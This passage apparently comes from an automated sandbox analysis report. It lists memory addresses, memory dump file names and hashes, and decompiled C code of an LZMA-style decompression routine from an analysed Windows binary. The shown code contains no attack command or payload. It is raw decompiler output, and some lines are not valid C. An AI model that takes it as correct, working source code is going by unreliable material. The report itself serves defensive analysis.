                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406bf9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                        • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                        • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                        • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406D13() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
